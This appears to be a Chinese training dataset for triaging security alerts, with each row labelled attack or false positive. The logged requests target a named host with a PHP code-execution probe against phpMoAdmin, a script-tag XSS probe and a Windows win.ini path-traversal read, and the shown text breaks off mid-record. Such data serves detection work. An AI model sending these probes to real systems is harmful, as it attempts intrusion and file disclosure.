你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637265", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732637265, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 0, "uri": "/phpMoAdmin/moadmin.php", "dport": 80, "vuln_name": "PHP代码执行攻击(机器学习)", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "124.239.114.146", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2020-11-25 19:53:49", "sport": 7956}, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "42909c1799407fc44eedf1135e4fe66c", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/phpMoAdmin/moadmin.php", "first_access_time": "2024-11-27 00:07:45", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击(机器学习)", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "c065908a1c1ae6861a6555319836b824", "xff": "", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02020000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732637246", "code_language": "PHP", "public_date": "2020-11-25 19:53:49", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/phpMoAdmin/moadmin.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b70", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "vlan_id": "", "vuln_type": "PHP代码执行攻击(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvcGhwTW9BZG1pbi9tb2FkbWluLnBocCBIVFRQLzEuMQ0KQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KQ29udGVudC1MZW5ndGg6IDMxDQpVc2VyLUFnZW50OiBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyAzNjBTRSkNCkhvc3Q6IHd3dy5obi5zZ2NjLmNuDQpDb25uZWN0aW9uOiBLZWVwLWFsaXZlDQoNCg==", "req_body": "b2JqZWN0PTE7cHJpbnQobWQ1KDMxMzM3KSk7ZXhpdA==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_e70f0841084615d4d7b2d42ed021885a", "access_time": "2024-11-27 00:07:45", "content-length": "31", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "124.239.114.146", "dimension": "3", "url_path": "/phpMoAdmin/moadmin.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "moadmin.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /phpMoAdmin/moadmin.php HTTP/1.1\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nContent-Length: 31\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "object=1;print(md5(31337));exit", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569456-PHP代码执行攻击(机器学习)", "rule_labels": "{}", "sport": "7956", "h_url": "/phpMoAdmin/moadmin.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637263", "vlan_id": "", "vuln_type": "发现跨站脚本绕过攻击(XSS)", "rule_version_str": "3.0.1122.14572", "attack_type": "跨站脚本攻击(XSS)", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "跨站脚本攻击(XSS)", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637263, "vuln_harm": "目标存在跨站脚本绕过攻击。 1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行,一般用来盗取浏览器cookie。 2.跨站脚本攻击漏洞,英文名称CrossSiteScripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 30, "uri": "/?search=<script>alert(1)</script>", "dport": 80, "vuln_name": "发现跨站脚本绕过攻击(XSS)", "rsp_status": 0, "code_language": "", "solution": "方案一:避免XSS的方法之一主要是将用户所提供的内容输入输出进行过滤,许多语言都有提供对HTML的过滤:可以利用下面这些函数对出现xss漏洞的参数进行过滤PHP的htmlentities()或是htmlspecialchars()。Python的cgi.escape()。ASP的Server.HTMLEncode()。ASP.NET的Server.HtmlEncode()或功能更强的MicrosoftAnti-CrossSiteScriptingLibraryJava的xssprotect(OpenSourceLibrary)。Node.js的node-validator。\r\n\r\n方案二:使用开源的漏洞防护插件。", "hit_start": 10, "detail_info": "跨站脚本绕过攻击,攻击者对payload进行了编码处理,如将payload转换成八进制、十六进制、unicode等格式。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "跨站脚本绕过攻击,攻击者对payload进行了编码处理,如将payload转换成八进制、十六进制、unicode等格式。", "public_date": "2023-08-02 18:16:19", "sport": 7685}, "solution": "方案一:避免XSS的方法之一主要是将用户所提供的内容输入输出进行过滤,许多语言都有提供对HTML的过滤:可以利用下面这些函数对出现xss漏洞的参数进行过滤PHP的htmlentities()或是htmlspecialchars()。Python的cgi.escape()。ASP的Server.HTMLEncode()。ASP.NET的Server.HtmlEncode()或功能更强的MicrosoftAnti-CrossSiteScriptingLibraryJava的xssprotect(OpenSourceLibrary)。Node.js的node-validator。\r\n\r\n方案二:使用开源的漏洞防护插件。", "hit_start": "10", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/c2VhcmNoPTxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4gSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "跨站脚本绕过攻击,攻击者对payload进行了编码处理,如将payload转换成八进制、十六进制、unicode等格式。", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:07:43", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现跨站脚本绕过攻击(XSS)", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "2840d0ac9fccb2e1a8bba1f87f747597", "proto": "http", "xff": "", "alarm_id": "20241127_b0ac3a1e89fe4101cc155e046b055817", "vuln_desc": "跨站脚本绕过攻击,攻击者对payload进行了编码处理,如将payload转换成八进制、十六进制、unicode等格式。", "attack_chain": "0x02020000", "access_time": "2024-11-27 00:07:43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16050000", "vuln_harm": "目标存在跨站脚本绕过攻击。 1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行,一般用来盗取浏览器cookie。 2.跨站脚本攻击漏洞,英文名称CrossSiteScripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637242", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2023-08-02 18:16:19", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "30", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?search=<script>alert(1)</script>", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10021722", "req_header": "GET /?search=<script>alert(1)</script> HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572450-发现跨站脚本绕过攻击(XSS)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "7685", "h_url": "/?search=<script>alert(1)</script>", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637263", "vlan_id": "", "vuln_type": "跨站脚本攻击(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "跨站脚本攻击(XSS)", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "跨站脚本攻击(XSS)", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637263, "vuln_harm": "目标存在跨站脚本攻击。 1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行,一般用来盗取浏览器cookie。 2.跨站脚本攻击漏洞,英文名称CrossSiteScripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "", "hit_end": 0, "uri": "/?search=<script>alert(1)</script>", "dport": 80, "vuln_name": "跨站脚本攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "方案一:避免XSS的方法之一主要是将用户所提供的内容输入输出进行过滤,许多语言都有提供对HTML的过滤:可以利用下面这些函数对出现xss漏洞的参数进行过滤PHP的htmlentities()或是htmlspecialchars()。Python的cgi.escape()。ASP的Server.HTMLEncode()。ASP.NET的Server.HtmlEncode()或功能更强的MicrosoftAnti-CrossSiteScriptingLibraryJava的xssprotect(OpenSourceLibrary)。Node.js的node-validator。\r\n方案二:使用开源的漏洞防护插件。具体可以参考:https://github.com/SpiderLabs/ModSecurity", "hit_start": 0, "detail_info": "存在跨站脚本攻击", "xff": "", "sip": "124.239.114.146", "vuln_desc": "存在跨站脚本攻击", "public_date": "2020-11-25 19:46:07", "sport": 7685}, "solution": "方案一:避免XSS的方法之一主要是将用户所提供的内容输入输出进行过滤,许多语言都有提供对HTML的过滤:可以利用下面这些函数对出现xss漏洞的参数进行过滤PHP的htmlentities()或是htmlspecialchars()。Python的cgi.escape()。ASP的Server.HTMLEncode()。ASP.NET的Server.HtmlEncode()或功能更强的MicrosoftAnti-CrossSiteScriptingLibraryJava的xssprotect(OpenSourceLibrary)。Node.js的node-validator。\r\n方案二:使用开源的漏洞防护插件。具体可以参考:https://github.com/SpiderLabs/ModSecurity", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/c2VhcmNoPTxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4gSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "存在跨站脚本攻击", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:07:43", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "跨站脚本攻击(机器学习)", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "c2bbedd85e92feebc757515321a73714", "proto": "http", "xff": "", "alarm_id": "20241127_13ff7a63acf89718c6f09cd2a0bad95e", "vuln_desc": "存在跨站脚本攻击", "attack_chain": "0x02010000", "access_time": "2024-11-27 00:07:43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16050000", "vuln_harm": "目标存在跨站脚本攻击。 1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行,一般用来盗取浏览器cookie。 2.跨站脚本攻击漏洞,英文名称CrossSiteScripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637246", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2020-11-25 19:46:07", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?search=<script>alert(1)</script>", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6c", "req_header": "GET /?search=<script>alert(1)</script> HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569452-跨站脚本攻击(机器学习)", "rule_labels": "{}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "7685", "h_url": "/?search=<script>alert(1)</script>", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637263", "vlan_id": "", "vuln_type": "跨站脚本攻击尝试", "rule_version_str": "3.0.1122.14572", "attack_type": "跨站脚本攻击(XSS)", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "跨站脚本攻击(XSS)", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637263, "vuln_harm": "Web站点中所包含的脚本直接将用户在HTML页面中的输入(通常是参数值)返回,而不预先加以清理。如果脚本在响应页面中返回由JavaScript代码组成的输入,浏览器便可以执行此输入。因此,有可能形成指向站点的若干链接,且其中一个参数包含恶意的JavaScript代码。该代码将在站点上下文中(由用户浏览器)执行,这使得该代码有权访问用户在该站点中具有访问权的cookie,以及站点中其他可通过用户浏览器访问的窗口。攻击依照下列方式继续进行:攻击者诱惑合法用户单击攻击者生成的链接。用户单击该链接时,便会生成对于Web站点的请求,其中的参数值含有恶意的JavaScript代码。如果Web站点将这个参数值嵌入在响应的HTML页面中(这正是站点问题的本质所在),恶意代码便会在用户浏览器中运行。2.比如有一天你打开一个网站,突然弹出一个窗口提示叫你登录你以为是这个网站让你登录当你输入账户密码以后你的所有操作都被黑客记录了,还有小白问“盗取浏览器cookie有什么用”黑客盗取你的浏览器cookies以后可以利用你的cookie登录你在特定网站或者论坛的账户。3.网站常见的存在跨站的地方多半都在留言本,搜索,评论。这些地方,特别是有留言和评论的地方要注意,你网站这两个地方存在跨站,黑客可以直接在这两个地方提交跨站攻击脚本,你登录后台查看留言和评论以后就被攻击了。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 26, "uri": "/?search=<script>alert(1)</script>", "dport": 80, "vuln_name": "跨站脚本攻击尝试", "rsp_status": 0, "code_language": "其他", "solution": "请对输入参数进行严格控制。", "hit_start": 6, "detail_info": "跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。攻击者正在进行跨站脚本攻击。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。攻击者正在进行跨站脚本攻击。", "public_date": "2018-11-14 00:00:00", "sport": 7685}, "solution": "请对输入参数进行严格控制。", "hit_start": "6", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/c2VhcmNoPTxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4gSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。攻击者正在进行跨站脚本攻击。", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:07:43", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "跨站脚本攻击尝试", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "45bf9a30226f62670a14ceaab7697c09", "proto": "http", "xff": "", "alarm_id": "20241127_0902d9bd2c6168f40346af151097c20e", "vuln_desc": "跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行。攻击者正在进行跨站脚本攻击。", "attack_chain": "0x02010000", "access_time": "2024-11-27 00:07:43", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16050000", "vuln_harm": "Web站点中所包含的脚本直接将用户在HTML页面中的输入(通常是参数值)返回,而不预先加以清理。如果脚本在响应页面中返回由JavaScript代码组成的输入,浏览器便可以执行此输入。因此,有可能形成指向站点的若干链接,且其中一个参数包含恶意的JavaScript代码。该代码将在站点上下文中(由用户浏览器)执行,这使得该代码有权访问用户在该站点中具有访问权的cookie,以及站点中其他可通过用户浏览器访问的窗口。攻击依照下列方式继续进行:攻击者诱惑合法用户单击攻击者生成的链接。用户单击该链接时,便会生成对于Web站点的请求,其中的参数值含有恶意的JavaScript代码。如果Web站点将这个参数值嵌入在响应的HTML页面中(这正是站点问题的本质所在),恶意代码便会在用户浏览器中运行。2.比如有一天你打开一个网站,突然弹出一个窗口提示叫你登录你以为是这个网站让你登录当你输入账户密码以后你的所有操作都被黑客记录了,还有小白问“盗取浏览器cookie有什么用”黑客盗取你的浏览器cookies以后可以利用你的cookie登录你在特定网站或者论坛的账户。3.网站常见的存在跨站的地方多半都在留言本,搜索,评论。这些地方,特别是有留言和评论的地方要注意,你网站这两个地方存在跨站,黑客可以直接在这两个地方提交跨站攻击脚本,你登录后台查看留言和评论以后就被攻击了。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637242", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "124.239.114.146", "public_date": "2018-11-14 00:00:00", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "26", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/?search=<script>alert(1)</script>", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10000c01", "req_header": "GET /?search=<script>alert(1)</script> HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,br\r\nUser-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\r\nHost: www.hn.sgcc.cn\r\nConnection: Keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "124.239.114.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268438529-跨站脚本攻击尝试", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/XP\", \"software\": \"IE/7.0\", \"hw_type\": \"PC\"}}", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "sport": "7685", "h_url": "/?search=<script>alert(1)</script>", "accept-encoding": "gzip,deflate,br", "user-agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637254", "vlan_id": "", "vuln_type": "发现读取Windows敏感文件行为", "rule_version_str": "3.0.1122.14572", "attack_type": "文件读取", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "文件读取", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637254, "vuln_harm": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 33, "uri": "/web/static/c:/windows/win.ini", "dport": 80, "vuln_name": "发现读取Windows敏感文件行为", "rsp_status": 0, "code_language": "", "solution": "如果读取成功,请修复文件读取漏洞,设置文件读取权限。", "hit_start": 13, "detail_info": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "public_date": "2023-07-31 16:36:47", "sport": 7552}, "solution": "如果读取成功,请修复文件读取漏洞,设置文件读取权限。", "hit_start": "13", "skyeye_id": "", "payload": {"req_header": 